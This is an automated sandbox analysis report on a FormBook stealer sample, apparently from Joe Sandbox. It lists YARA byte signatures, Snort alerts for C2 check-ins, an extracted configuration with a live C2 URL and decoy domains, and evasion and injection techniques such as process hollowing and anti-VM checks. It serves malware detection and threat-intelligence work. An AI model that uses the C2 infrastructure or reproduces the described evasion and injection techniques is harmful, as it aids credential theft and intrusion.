Edit tour

Windows Analysis Report
hj3YCvtlg7.exe

Overview

General Information

Sample name:	hj3YCvtlg7.exe renamed because original name is a hash value
Original sample name:	4850a766fab45d5947075658d9c6bbf4b970f0d05b082c1472b93d9a7fa3d093.exe
Analysis ID:	1422327
MD5:	dad6e1001c72b68d690fedf88254f157
SHA1:	8304a2d91515ca2f1079f787de0b8a776941c2cd
SHA256:	4850a766fab45d5947075658d9c6bbf4b970f0d05b082c1472b93d9a7fa3d093
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Reads the DNS cache

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Uses ipconfig to lookup or modify the Windows network settings

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

hj3YCvtlg7.exe (PID: 7652 cmdline: "C:\Users\user\Desktop\hj3YCvtlg7.exe" MD5: DAD6E1001C72B68D690FEDF88254F157)

hj3YCvtlg7.exe (PID: 7816 cmdline: "C:\Users\user\Desktop\hj3YCvtlg7.exe" MD5: DAD6E1001C72B68D690FEDF88254F157)

hj3YCvtlg7.exe (PID: 7824 cmdline: "C:\Users\user\Desktop\hj3YCvtlg7.exe" MD5: DAD6E1001C72B68D690FEDF88254F157)

hj3YCvtlg7.exe (PID: 7832 cmdline: "C:\Users\user\Desktop\hj3YCvtlg7.exe" MD5: DAD6E1001C72B68D690FEDF88254F157)

explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

ipconfig.exe (PID: 7884 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)

cmd.exe (PID: 7964 cmdline: /c del "C:\Users\user\Desktop\hj3YCvtlg7.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.yoursweets.online/vr01/"], "decoy": ["eclipsefoodservice.com", "oregonjobs.co", "ethicai.pro", "frontierconnects.co", "elcaporalburley.com", "exoticskinco.com", "topdeals.biz", "carmensbookstore.com", "mayorii.com", "viewhird.com", "bharatcrimecontrol24news.com", "sampleshubusa.com", "molobeverello.com", "nicholsonflooringservices.com", "kidscircle.shop", "771010.cc", "poseidoncrm.com", "liviafiorelli.com", "flavorfog.online", "xaqh.info", "bombslot-42.co", "floatshop.store", "massagechairspecialists.com", "mks-digital.net", "wti395.vip", "entelnegocio.com", "ansemgram.com", "owletbaby.shop", "skyhut.io", "kakevpn.com", "protectmichildren.net", "gratiasempirellc.com", "hsyxkj.com", "kirtirefrigeration.com", "makeyousurprise.com", "qqixe.shop", "svshop.us", "yesxoit.xyz", "jupitr-claim.top", "laneflowlogistics.com", "brandonbirk.com", "vjll.net", "maturak-na-klic.online", "mingshengglass.com", "theshopsatmaunalani.com", "accidentapp.online", "fertnow.com", "nicolbauer.com", "mym-agency.com", "efxprm.com", "studioenginedemo.com", "erabits.com", "chhpiyg.pro", "adadripdropz.com", "dropperdeals.com", "viphao200.com", "lasik-eye-surgery-45089.bond", "helyibudapest.com", "michellecaldwelldesign.com", "snugandkind.com", "redirect2-userweb.com", "pataltarghya.com", "tumi123ans.lol", "familyofficesheet.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7fcc1:$a1: 3C 30 50 4F 53 54 74 09 40 0xae0e1:$a1: 3C 30 50 4F 53 54 74 09 40 0xdb501:$a1: 3C 30 50 4F 53 54 74 09 40 0x96630:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xc4a50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xf1e70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x8443f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xb285f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xdfc7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x8f327:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xbd747:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xeab67:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83378:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x835f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xb1798:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xb1a12:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xdebb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xdee32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8f125:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xbd545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xea965:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8ec11:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xbd031:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xea451:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8f227:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xbd647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xeaa67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8f39f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xbd7bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xeabdf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8400a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xb242a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xdf84a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x922b9:$sqlite3step: 68 34 1C 7B E1 0x923cc:$sqlite3step: 68 34 1C 7B E1 0xc06d9:$sqlite3step: 68 34 1C 7B E1 0xc07ec:$sqlite3step: 68 34 1C 7B E1 0xedaf9:$sqlite3step: 68 34 1C 7B E1 0xedc0c:$sqlite3step: 68 34 1C 7B E1 0x922e8:$sqlite3text: 68 38 2A 90 C5 0x9240d:$sqlite3text: 68 38 2A 90 C5 0xc0708:$sqlite3text: 68 38 2A 90 C5 0xc082d:$sqlite3text: 68 38 2A 90 C5 0xedb28:$sqlite3text: 68 38 2A 90 C5 0xedc4d:$sqlite3text: 68 38 2A 90 C5 0x922fb:$sqlite3blob: 68 53 D8 7F 8C 0x92423:$sqlite3blob: 68 53 D8 7F 8C 0xc071b:$sqlite3blob: 68 53 D8 7F 8C 0xc0843:$sqlite3blob: 68 53 D8 7F 8C 0xedb3b:$sqlite3blob: 68 53 D8 7F 8C 0xedc63:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: hj3YCvtlg7.exe PID: 7652	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: hj3YCvtlg7.exe PID: 7652	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x277cd:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: hj3YCvtlg7.exe PID: 7832	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6782f:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: ipconfig.exe PID: 7884	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5ddd:$a1: 3C 30 50 4F 53 54 74 09 40 0xa93a:$a1: 3C 30 50 4F 53 54 74 09 40 0x129b5e:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.hj3YCvtlg7.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.hj3YCvtlg7.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.hj3YCvtlg7.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.2.hj3YCvtlg7.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.hj3YCvtlg7.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
5.2.hj3YCvtlg7.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.hj3YCvtlg7.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.hj3YCvtlg7.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.2.hj3YCvtlg7.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.hj3YCvtlg7.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 104.21.56.10

Timestamp:	04/08/24-15:23:24.247871
SID:	2031412
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 66.147.240.91

Timestamp:	04/08/24-15:25:48.239107
SID:	2031412
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 172.67.154.171

Timestamp:	04/08/24-15:26:08.604254
SID:	2031412
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 13.248.169.48

Timestamp:	04/08/24-15:25:06.359757
SID:	2031412
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 13.248.169.48

Timestamp:	04/08/24-15:23:02.817331
SID:	2031412
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 102.134.40.151

Timestamp:	04/08/24-15:24:04.974063
SID:	2031412
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 3.33.130.190

Timestamp:	04/08/24-15:24:45.933979
SID:	2031412
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.yoursweets.online	Avira URL Cloud: Label: malware
Source: www.yoursweets.online/vr01/	Avira URL Cloud: Label: malware
Source: http://www.jupitr-claim.top/vr01/www.nicolbauer.com	Avira URL Cloud: Label: malware
Source: http://www.jupitr-claim.top	Avira URL Cloud: Label: malware
Source: http://www.jupitr-claim.top/vr01/	Avira URL Cloud: Label: malware
Source: http://www.yoursweets.online/vr01/www.ethicai.pro	Avira URL Cloud: Label: malware
Source: http://www.yoursweets.online/vr01/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.yoursweets.online/vr01/"], "decoy": ["eclipsefoodservice.com", "oregonjobs.co", "ethicai.pro", "frontierconnects.co", "elcaporalburley.com", "exoticskinco.com", "topdeals.biz", "carmensbookstore.com", "mayorii.com", "viewhird.com", "bharatcrimecontrol24news.com", "sampleshubusa.com", "molobeverello.com", "nicholsonflooringservices.com", "kidscircle.shop", "771010.cc", "poseidoncrm.com", "liviafiorelli.com", "flavorfog.online", "xaqh.info", "bombslot-42.co", "floatshop.store", "massagechairspecialists.com", "mks-digital.net", "wti395.vip", "entelnegocio.com", "ansemgram.com", "owletbaby.shop", "skyhut.io", "kakevpn.com", "protectmichildren.net", "gratiasempirellc.com", "hsyxkj.com", "kirtirefrigeration.com", "makeyousurprise.com", "qqixe.shop", "svshop.us", "yesxoit.xyz", "jupitr-claim.top", "laneflowlogistics.com", "brandonbirk.com", "vjll.net", "maturak-na-klic.online", "mingshengglass.com", "theshopsatmaunalani.com", "accidentapp.online", "fertnow.com", "nicolbauer.com", "mym-agency.com", "efxprm.com", "studioenginedemo.com", "erabits.com", "chhpiyg.pro", "adadripdropz.com", "dropperdeals.com", "viphao200.com", "lasik-eye-surgery-45089.bond", "helyibudapest.com", "michellecaldwelldesign.com", "snugandkind.com", "redirect2-userweb.com", "pataltarghya.com", "tumi123ans.lol", "familyofficesheet.com"]}

Multi AV Scanner detection for submitted file

Source: hj3YCvtlg7.exe	ReversingLabs: Detection: 68%
Source: hj3YCvtlg7.exe	Virustotal: Detection: 71%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
